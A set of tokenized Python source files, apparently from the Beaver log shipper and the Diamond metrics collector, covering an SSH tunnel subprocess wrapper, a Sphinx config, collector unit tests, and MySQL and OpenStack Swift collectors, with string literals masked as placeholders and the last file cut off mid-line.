<s> import os <EOL> import signal <EOL> import subprocess <EOL> import time <EOL> from beaver . base_log import BaseLog <EOL> def create_ssh_tunnel ( beaver_config , logger = None ) : <EOL> """<STR_LIT>""" <EOL> if not beaver_config . use_ssh_tunnel ( ) : <EOL> return None <EOL> logger . info ( "<STR_LIT>" ) <EOL> return BeaverSshTunnel ( beaver_config , logger = logger ) <EOL> class BeaverSubprocess ( BaseLog ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , beaver_config , logger = None ) : <EOL> """<STR_LIT>""" <EOL> super ( BeaverSubprocess , self ) . __init__ ( logger = logger ) <EOL> self . _log_template = '<STR_LIT>' <EOL> self . _beaver_config = beaver_config <EOL> self . _command = '<STR_LIT>' <EOL> self . _subprocess = None <EOL> self . _logger = logger <EOL> def run ( self ) : <EOL> self . _log_debug ( '<STR_LIT>' . format ( self . _command ) ) <EOL> self . _subprocess = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT:-c>' , self . _command ] , preexec_fn = os . setsid ) <EOL> self . poll ( ) <EOL> def poll ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _subprocess is not None : <EOL> self . _subprocess . poll ( ) <EOL> time . sleep ( self . _beaver_config . get ( '<STR_LIT>' ) ) <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _subprocess is not None : <EOL> os . killpg ( self . _subprocess . pid , signal . SIGTERM ) <EOL> self . _subprocess = None <EOL> class BeaverSshTunnel ( BeaverSubprocess ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , beaver_config , logger = None ) : <EOL> super ( BeaverSshTunnel , self ) . __init__ ( beaver_config , logger = logger ) <EOL> self . _log_template = '<STR_LIT>' <EOL> key_file = beaver_config . get ( '<STR_LIT>' ) <EOL> tunnel = beaver_config . get ( '<STR_LIT>' ) <EOL> tunnel_port = beaver_config . get ( '<STR_LIT>' ) <EOL> remote_host = beaver_config . get ( '<STR_LIT>' ) <EOL> remote_port = beaver_config . get ( '<STR_LIT>' ) <EOL> ssh_opts = [ ] <EOL> if self . get_port ( tunnel ) : <EOL> ssh_opts . append ( '<STR_LIT>' . format ( self . get_port ( tunnel ) ) ) <EOL> tunnel = self . get_host ( tunnel ) <EOL> ssh_opts . append ( '<STR_LIT>' ) <EOL> ssh_opts . append ( '<STR_LIT>' ) <EOL> ssh_opts . append ( '<STR_LIT>' ) <EOL> ssh_opts = ssh_opts + beaver_config . get ( '<STR_LIT>' ) <EOL> command = '<STR_LIT>' <EOL> self . _command = command . format ( '<STR_LIT:U+0020>' . join ( ssh_opts ) , tunnel_port , remote_host , remote_port , key_file , tunnel ) <EOL> self . run ( ) <EOL> def get_host ( self , tunnel = None ) : <EOL> port = self . get_port ( tunnel ) <EOL> if not port : <EOL> return tunnel <EOL> return tunnel [ <NUM_LIT:0> : - ( len ( port ) + <NUM_LIT:1> ) ] <EOL> def get_port ( self , tunnel = None ) : <EOL> host_port = None <EOL> port = None <EOL> if tunnel : <EOL> host_port = tunnel . split ( '<STR_LIT:@>' ) [ - <NUM_LIT:1> ] <EOL> if host_port and len ( host_port . split ( '<STR_LIT::>' ) ) == <NUM_LIT:2> : <EOL> port = host_port . split ( '<STR_LIT::>' ) [ - <NUM_LIT:1> ] <EOL> return port </s>
<s> import sys <EOL> import os <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import Mock <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from diskusage import DiskUsageCollector <EOL> class TestDiskUsageCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . collector = DiskUsageCollector ( config , None ) <EOL> def test_config ( self ) : <EOL> self . assertFalse ( self . collector . config [ '<STR_LIT>' ] ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( DiskUsageCollector ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> def test_get_disk_statistics ( self ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( return_value = self . getFixture ( '<STR_LIT>' ) ) ) <EOL> open_mock = patch_open . start ( ) <EOL> result = self . collector . get_disk_statistics ( ) <EOL> patch_open . stop ( ) <EOL> open_mock . assert_called_once_with ( '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> sorted ( result . keys ( ) ) , <EOL> [ ( <NUM_LIT:8> , <NUM_LIT:0> ) , ( <NUM_LIT:8> , <NUM_LIT:1> ) , ( <NUM_LIT:8> , <NUM_LIT:16> ) , ( <NUM_LIT:8> , <NUM_LIT> ) , ( <NUM_LIT:8> , <NUM_LIT:32> ) , <EOL> ( <NUM_LIT:8> , <NUM_LIT> ) , ( <NUM_LIT:8> , <NUM_LIT> ) , ( <NUM_LIT:8> , <NUM_LIT> ) , ( <NUM_LIT:9> , <NUM_LIT:0> ) ] ) <EOL> return result <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:10> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:20> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> metrics = self . getPickledResults ( '<STR_LIT>' ) <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_verify_supporting_vda_and_xvdb ( self , publish_mock ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:10> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:20> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> metrics = self . getPickledResults ( <EOL> '<STR_LIT>' ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_verify_supporting_md_dm ( self , publish_mock ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:10> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:20> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> metrics = self . getPickledResults ( '<STR_LIT>' ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_verify_supporting_disk ( self , publish_mock ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:10> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:20> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> metrics = self . getPickledResults ( '<STR_LIT>' ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> @ patch ( '<STR_LIT>' , Mock ( return_value = True ) ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_service_Time ( self , publish_mock ) : <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT:10> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> self . assertPublishedMany ( publish_mock , { } ) <EOL> patch_open = patch ( <EOL> '<STR_LIT>' , <EOL> Mock ( <EOL> return_value = self . getFixture ( <EOL> '<STR_LIT>' ) ) ) <EOL> patch_time = patch ( '<STR_LIT>' , Mock ( return_value = <NUM_LIT> ) ) <EOL> patch_open . start ( ) <EOL> patch_time . start ( ) <EOL> self . collector . collect ( ) <EOL> patch_open . stop ( ) <EOL> patch_time . stop ( ) <EOL> metrics = self . getPickledResults ( '<STR_LIT>' ) <EOL> self . assertPublishedMany ( publish_mock , metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import unittest <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from hadoop import HadoopCollector <EOL> import os <EOL> class TestHadoopCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : [ os . path . dirname ( __file__ ) + '<STR_LIT>' ] , <EOL> } ) <EOL> self . collector = HadoopCollector ( config , { } ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( HadoopCollector ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test_should_work_with_real_data ( self , publish_mock ) : <EOL> self . collector . collect ( ) <EOL> metrics = self . getPickledResults ( '<STR_LIT>' ) <EOL> self . setDocExample ( collector = self . collector . __class__ . __name__ , <EOL> metrics = metrics , <EOL> defaultpath = self . collector . config [ '<STR_LIT:path>' ] ) <EOL> self . assertPublishedMetricMany ( publish_mock , metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> import urllib2 <EOL> try : <EOL> from xml . etree import ElementTree <EOL> except ImportError : <EOL> ElementTree = None <EOL> from test import CollectorTestCase <EOL> from test import get_collector_config <EOL> from test import run_only <EOL> from test import unittest <EOL> from mock import patch <EOL> from diamond . collector import Collector <EOL> from kafkastat import KafkaCollector <EOL> def run_only_if_ElementTree_is_available ( func ) : <EOL> try : <EOL> from xml . etree import ElementTree <EOL> except ImportError : <EOL> ElementTree = None <EOL> pred = lambda : ElementTree is not None <EOL> return run_only ( func , pred ) <EOL> class TestKafkaCollector ( CollectorTestCase ) : <EOL> def setUp ( self ) : <EOL> config = get_collector_config ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:10> <EOL> } ) <EOL> self . collector = KafkaCollector ( config , None ) <EOL> def _get_xml_fixture ( self , name ) : <EOL> fixture = self . getFixture ( name ) <EOL> return ElementTree . fromstring ( fixture . getvalue ( ) ) <EOL> def test_import ( self ) : <EOL> self . assertTrue ( KafkaCollector ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get ( self , urlopen_mock ) : <EOL> urlopen_mock . return_value = self . getFixture ( '<STR_LIT>' ) <EOL> result = self . collector . _get ( '<STR_LIT>' ) <EOL> result_string = ElementTree . tostring ( result ) <EOL> self . assertEqual ( result_string , '<STR_LIT>' ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_httperror ( self , urlopen_mock ) : <EOL> urlopen_mock . side_effect = urllib2 . URLError ( '<STR_LIT>' ) <EOL> result = self . collector . _get ( '<STR_LIT>' ) <EOL> self . assertFalse ( result ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_get_bad_xml ( self , urlopen_mock ) : <EOL> urlopen_mock . return_value = self . getFixture ( '<STR_LIT>' ) <EOL> result = self . collector . _get ( '<STR_LIT>' ) <EOL> self . assertFalse ( result ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch . object ( KafkaCollector , '<STR_LIT>' ) <EOL> def test_get_mbeans ( self , get_mock ) : <EOL> get_mock . return_value = self . _get_xml_fixture ( '<STR_LIT>' ) <EOL> expected_names = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> found_beans = self . collector . get_mbeans ( '<STR_LIT:*>' ) <EOL> self . assertEqual ( found_beans , expected_names ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch . object ( KafkaCollector , '<STR_LIT>' ) <EOL> def test_get_mbeans_get_fail ( self , get_mock ) : <EOL> get_mock . return_value = None <EOL> found_beans = self . collector . get_mbeans ( '<STR_LIT:*>' ) <EOL> self . assertEqual ( found_beans , None ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch . object ( KafkaCollector , '<STR_LIT>' ) <EOL> def test_query_mbean ( self , get_mock ) : <EOL> get_mock . return_value = self . _get_xml_fixture ( '<STR_LIT>' ) <EOL> expected_metrics = { <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : int ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> } <EOL> metrics = self . collector . query_mbean ( '<STR_LIT>' ) <EOL> self . assertEqual ( metrics , expected_metrics ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch . object ( KafkaCollector , '<STR_LIT>' ) <EOL> def test_query_mbean_with_prefix ( self , get_mock ) : <EOL> get_mock . return_value = self . _get_xml_fixture ( '<STR_LIT>' ) <EOL> expected_metrics = { <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : int ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : long ( '<STR_LIT>' ) , <EOL> } <EOL> metrics = self . collector . query_mbean ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> self . assertEqual ( metrics , expected_metrics ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch . object ( KafkaCollector , '<STR_LIT>' ) <EOL> def test_query_mbean_fail ( self , get_mock ) : <EOL> get_mock . return_value = None <EOL> metrics = self . collector . query_mbean ( '<STR_LIT>' ) <EOL> self . assertEqual ( metrics , None ) <EOL> @ run_only_if_ElementTree_is_available <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch . object ( Collector , '<STR_LIT>' ) <EOL> def test ( self , publish_mock , urlopen_mock ) : <EOL> urlopen_mock . side_effect = [ <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> self . getFixture ( '<STR_LIT>' ) , <EOL> ] <EOL> self . collector . collect ( ) <EOL> expected_metrics = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> self . assertPublishedMany ( publish_mock , expected_metrics ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> try : <EOL> import MySQLdb <EOL> from MySQLdb import MySQLError <EOL> except ImportError : <EOL> MySQLdb = None <EOL> import diamond <EOL> import time <EOL> import re <EOL> class MySQLPerfCollector ( diamond . collector . Collector ) : <EOL> def process_config ( self ) : <EOL> super ( MySQLPerfCollector , self ) . process_config ( ) <EOL> self . db = None <EOL> self . last_wait_count = { } <EOL> self . last_wait_sum = { } <EOL> self . last_timestamp = { } <EOL> self . last_data = { } <EOL> self . monitors = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } <EOL> } <EOL> if self . config [ '<STR_LIT>' ] . __class__ . __name__ != '<STR_LIT:list>' : <EOL> self . config [ '<STR_LIT>' ] = [ self . config [ '<STR_LIT>' ] ] <EOL> if '<STR_LIT:host>' in self . config : <EOL> hoststr = "<STR_LIT>" % ( <EOL> self . config [ '<STR_LIT:user>' ] , <EOL> self . config [ '<STR_LIT>' ] , <EOL> self . config [ '<STR_LIT:host>' ] , <EOL> self . config [ '<STR_LIT:port>' ] , <EOL> self . config [ '<STR_LIT>' ] , <EOL> ) <EOL> self . config [ '<STR_LIT>' ] . append ( hoststr ) <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( MySQLPerfCollector , self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( MySQLPerfCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT:False>' , <EOL> } ) <EOL> return config <EOL> def connect ( self , params ) : <EOL> if MySQLdb is None : <EOL> self . log . error ( '<STR_LIT>' ) <EOL> return <EOL> try : <EOL> self . db = MySQLdb . connect ( ** params ) <EOL> except MySQLError , e : <EOL> self . log . error ( '<STR_LIT>' , <EOL> e ) <EOL> return { } <EOL> self . log . debug ( '<STR_LIT>' ) <EOL> def query_list ( self , query , params ) : <EOL> cursor = self . db . cursor ( ) <EOL> cursor . execute ( query , params ) <EOL> return list ( cursor . fetchall ( ) ) <EOL> def slave_load ( self , nickname , thread ) : <EOL> data = self . query_list ( """<STR_LIT>""" , ( thread , ) ) <EOL> wait_sum = sum ( [ x [ <NUM_LIT:1> ] for x in data ] ) <EOL> wait_count = sum ( [ x [ <NUM_LIT:2> ] for x in data ] ) <EOL> timestamp = int ( time . time ( ) ) <EOL> if <NUM_LIT:0> in data and len ( data [ <NUM_LIT:0> ] ) > <NUM_LIT:5> : <EOL> cur_event_name , timestamp = data [ <NUM_LIT:0> ] [ <NUM_LIT:3> : ] <EOL> if thread not in self . last_wait_sum : <EOL> self . last_wait_sum [ thread ] = wait_sum <EOL> self . last_wait_count [ thread ] = wait_count <EOL> self . last_timestamp [ thread ] = timestamp <EOL> self . last_data [ thread ] = data <EOL> return <EOL> wait_delta = wait_sum - self . last_wait_sum [ thread ] <EOL> time_delta = ( timestamp - self . last_timestamp [ thread ] ) * <NUM_LIT> <EOL> if time_delta == <NUM_LIT:0> : <EOL> return <EOL> thread_name = thread [ thread . rfind ( '<STR_LIT:/>' ) + <NUM_LIT:1> : ] <EOL> data . append ( <EOL> [ '<STR_LIT>' , <EOL> sum ( [ x [ <NUM_LIT:1> ] for x in data <EOL> if x [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) ] ) ] ) <EOL> data . append ( <EOL> [ '<STR_LIT>' , <EOL> sum ( [ x [ <NUM_LIT:1> ] for x in data <EOL> if ( x [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) and <EOL> x [ <NUM_LIT:0> ] not in self . monitors [ thread_name ] ) ] ) - data [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ] ) <EOL> data . append ( <EOL> [ '<STR_LIT>' , <EOL> sum ( [ x [ <NUM_LIT:1> ] for x in data <EOL> if x [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) ] ) ] ) <EOL> data . append ( <EOL> [ '<STR_LIT>' , <EOL> sum ( [ x [ <NUM_LIT:1> ] for x in data <EOL> if ( x [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) and <EOL> x [ <NUM_LIT:0> ] not in self . monitors [ thread_name ] ) ] ) ] ) <EOL> for d in zip ( self . last_data [ thread ] , data ) : <EOL> if d [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] in self . monitors [ thread_name ] : <EOL> self . publish ( nickname + thread_name + '<STR_LIT:.>' + <EOL> self . monitors [ thread_name ] [ d [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ] , <EOL> ( d [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] - d [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) / time_delta * <NUM_LIT:100> ) <EOL> self . publish ( nickname + thread_name + '<STR_LIT>' , <EOL> float ( time_delta - wait_delta ) / time_delta * <NUM_LIT:100> ) <EOL> self . last_wait_sum [ thread ] = wait_sum <EOL> self . last_wait_count [ thread ] = wait_count <EOL> self . last_timestamp [ thread ] = timestamp <EOL> self . last_data [ thread ] = data <EOL> def collect ( self ) : <EOL> for host in self . config [ '<STR_LIT>' ] : <EOL> matches = re . search ( <EOL> '<STR_LIT>' , host ) <EOL> if not matches : <EOL> continue <EOL> params = { } <EOL> params [ '<STR_LIT:host>' ] = matches . group ( <NUM_LIT:3> ) <EOL> try : <EOL> params [ '<STR_LIT:port>' ] = int ( matches . group ( <NUM_LIT:4> ) ) <EOL> except ValueError : <EOL> params [ '<STR_LIT:port>' ] = <NUM_LIT> <EOL> params [ '<STR_LIT>' ] = matches . group ( <NUM_LIT:5> ) <EOL> params [ '<STR_LIT:user>' ] = matches . group ( <NUM_LIT:1> ) <EOL> params [ '<STR_LIT>' ] = matches . group ( <NUM_LIT:2> ) <EOL> nickname = matches . group ( <NUM_LIT:6> ) <EOL> if len ( nickname ) : <EOL> nickname += '<STR_LIT:.>' <EOL> self . connect ( params = params ) <EOL> if self . config [ '<STR_LIT>' ] : <EOL> self . slave_load ( nickname , '<STR_LIT>' ) <EOL> self . slave_load ( nickname , '<STR_LIT>' ) <EOL> self . db . close ( ) </s>
<s> """<STR_LIT>""" <EOL> import diamond . collector <EOL> from subprocess import Popen , PIPE <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> import simplejson as json <EOL> class OpenstackSwiftCollector ( diamond . collector . Collector ) : <EOL> def get_default_config_help ( self ) : <EOL> config_help = super ( OpenstackSwiftCollector , <EOL> self ) . get_default_config_help ( ) <EOL> config_help . update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' + <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:user>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' + <EOL> '<STR_LIT>' <EOL> } ) <EOL> return config_help <EOL> def get_default_config ( self ) : <EOL> """<STR_LIT>""" <EOL> config = super ( OpenstackSwiftCollector , self ) . get_default_config ( ) <EOL> config . update ( { <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } ) <EOL> return config <EOL> def collect ( self ) : <EOL> if ( self . config [ '<STR_LIT>' ] ) : <EOL> p = Popen ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> stdout = PIPE , <EOL> stderr = PIPE ) <EOL> stdout , stderr = p . communicate ( ) <EOL> self . publish ( '<STR_LIT>' , len ( stderr . split ( '<STR_LIT:\n>' ) ) - <NUM_LIT:1> ) <EOL> data = json . loads ( stdout ) <EOL> for t in ( '<STR_LIT:object>' , '<STR_LIT>' ) : <EOL> for ( k , v ) in data [ t ] . items ( ) : <EOL> self . publish ( '<STR_LIT>' % ( t , k ) , v ) <EOL> if ( self . config [ '<STR_LIT>' ] ) : <EOL> account = '<STR_LIT>' % ( self . config [ '<STR_LIT>' ] , self . config [ '<STR_LIT:user>' ] ) <EOL> for container in self . config [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) : <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , self . config [ '<STR_LIT>' ] , 